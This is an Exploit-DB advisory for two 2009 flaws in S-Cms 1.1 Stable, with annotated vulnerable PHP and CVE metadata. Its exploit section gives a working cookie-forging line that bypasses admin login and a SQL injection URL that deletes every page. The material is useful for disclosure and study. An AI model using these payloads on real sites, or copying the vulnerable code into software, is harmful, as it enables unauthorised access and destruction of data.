ID EDB-ID:8071
Type exploitdb
Reporter x0r
Modified 2009-02-17T00:00:00
Description
S-Cms 1.1 Stable Insecure Cookie Handling / Mass Page Delete Vulns. CVE-2009-0863,CVE-2009-0864. Webapps exploit for php platform
#########################################################################################
[0x01] Information:
Name : S-Cms 1.1 Stable
Download : http://www.hotscripts.com/listings/jump/download/87992/
Vulnerability : Insecure Cookie Handling / Mass Page Delete
Author : x0r
Contact : andry2000@hotmail.it
Notes : Proud to be Italian
#########################################################################################
[0x02] Bug:
Bugged files are /[path]/login_action.php (insecure cookie handling) and /[path]/admin/delete_page.php (SQL injection through the id parameter)
[Code]
// Login handler excerpt (the advisory names login_action.php). The excerpt is
// truncated: the if-block opened below is never closed here.
// Credentials are read straight from the POST body.
$user=$_POST['username'];
$pass=$_POST['password'];
// Every row of cms_admin is fetched; no WHERE clause narrows it to the posted user.
$select_admin = mysql_query("SELECT * FROM cms_admin");
// Each iteration overwrites $username/$password, so after the loop they hold
// only the last row returned.
while($dati_admin=mysql_fetch_array($select_admin)){
$username=$dati_admin['username'];
$password=$dati_admin['password'];
}
// Loose (==) comparison of the posted password against the stored column value.
// NOTE(review): this suggests the password is stored or compared unhashed;
// confirm against the schema. password_hash()/password_verify() is the fix.
if ($user == $username && $pass == $password){
// Root cause of CVE-2009-0864: the only login state is a client-side cookie with
// the constant value "OK". Nothing in it is bound to the user or to a server-side
// secret, so the server cannot tell a cookie it issued from one the client set.
// Keep authentication state server-side instead: session_start(), $_SESSION, and
// session_regenerate_id(true) on successful login.
// $logintime is defined outside this excerpt.
setcookie("login", "OK", time() + $logintime); #0wn3d
[/code]
[CODE]
// Page-delete excerpt (admin/delete_page.php, CVE-2009-0863). The excerpt is
// truncated: the else-block opened below is never closed here.
// $id comes from the query string with no validation or escaping.
$id=$_GET['id'];
// The raw value is interpolated between single quotes, so the caller controls the
// WHERE clause of the DELETE, not just the id being matched.
// Fix: cast to an integer, or bind id as a parameter with a PDO/mysqli prepared
// statement. The mysql_* extension used here was removed in PHP 7.
// NOTE(review): no access check is visible in this excerpt, and the delete is
// triggered by a GET request. The handler should also require a server-side
// authenticated session, accept POST only, and verify a CSRF token.
$delete=mysql_query("DELETE FROM cms_content WHERE id='$id'");
// mysql_query() returns TRUE for any DELETE that executes, even when no row
// matched, so the success branch does not prove a page was removed.
if ($delete){
echo ""._DELETE_PAGE_SUCCESS."";
} else {
echo ""._DELETE_PAGE_ERROR."";
[/code]
#########################################################################################
[0x03] Exploit:
Exploit: 1- javascript:document.cookie = "login=OK; path=/"
2- http://[victim].org/path/admin/delete_page.php?id=' or 1=1/*
########################################################################################
# milw0rm.com [2009-02-17]
{"id": "EDB-ID:8071", "hash": "a8d5e93c1fc3604085e3066492ba0491", "type": "exploitdb", "bulletinFamily": "exploit", "title": "S-CMS 1.1 Stable Insecure Cookie Handling / Mass Page Delete Vulns", "description": "S-Cms 1.1 Stable Insecure Cookie Handling / Mass Page Delete Vulns. CVE-2009-0863,CVE-2009-0864. Webapps exploit for php platform", "published": "2009-02-17T00:00:00", "modified": "2009-02-17T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/8071/", "reporter": "x0r", "references": [], "cvelist": ["CVE-2009-0864", "CVE-2009-0863"], "lastseen": "2016-02-01T03:41:08", "history": [], "viewCount": 6, "enchantments": {"score": {"value": 6.5, "vector": "NONE", "modified": "2016-02-01T03:41:08"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-0863", "CVE-2009-0864"]}], "modified": "2016-02-01T03:41:08"}, "vulnersScore": 6.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/8071/", "sourceData": "#########################################################################################\n[0x01] Informations:\n\nName : S-Cms 1.1 Stable \nDownload : http://www.hotscripts.com/listings/jump/download/87992/\nVulnerability : Insecure Cookie Handling / Mass Page Delete\nAuthor : x0r\nContact : andry2000@hotmail.it\nNotes : Proud to be Italian \n#########################################################################################\n[0x02] Bug:\n\nBugged file is /[path]/login_action.php ... 
/admin/delete_page.php\n\n[Code]\n\n$user=$_POST['username'];\n$pass=$_POST['password'];\n\n$select_admin = mysql_query(\"SELECT * FROM cms_admin\");\n\nwhile($dati_admin=mysql_fetch_array($select_admin)){\n$username=$dati_admin['username'];\n$password=$dati_admin['password'];\n}\n\nif ($user == $username && $pass == $password){\n \n setcookie(\"login\", \"OK\", time() + $logintime); #0wn3d\n\n[/code]\n\n[CODE]\n\t\n\t\t$id=$_GET['id'];\n\t\t\n\t\t$delete=mysql_query(\"DELETE FROM cms_content WHERE id='$id'\");\n\t\t\n\t\t\n\t\tif ($delete){\n\t\t\n\t\techo \"\"._DELETE_PAGE_SUCCESS.\"\";\n\t\t\n\t\t} else {\n\t\t\n\t\techo \"\"._DELETE_PAGE_ERROR.\"\";\n[/code]\n\n#########################################################################################\n[0x03] Exploit:\n\nExploit: 1- javascript:document.cookie = \"login=OK; path=/\"\n 2- http://[victim].org/path/admin/delete_page.php?id=' or 1=1/*\n\n########################################################################################\n\n# milw0rm.com [2009-02-17]\n", "osvdbidlist": ["52570", "52571"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:09:57", "bulletinFamily": "NVD", "description": "SQL injection vulnerability in admin/delete_page.php in S-Cms 1.1 Stable allows remote attackers to execute arbitrary SQL commands via the id parameter.", "modified": "2017-09-29T01:34:00", "id": "CVE-2009-0863", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0863", "published": "2009-03-10T14:30:00", "title": "CVE-2009-0863", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:09:57", "bulletinFamily": "NVD", "description": "S-Cms 1.1 Stable allows remote attackers to bypass authentication and obtain administrative access via an OK value for the login cookie.", "modified": "2017-09-29T01:34:00", "id": "CVE-2009-0864", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0864", "published": "2009-03-10T14:30:00", "title": "CVE-2009-0864", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}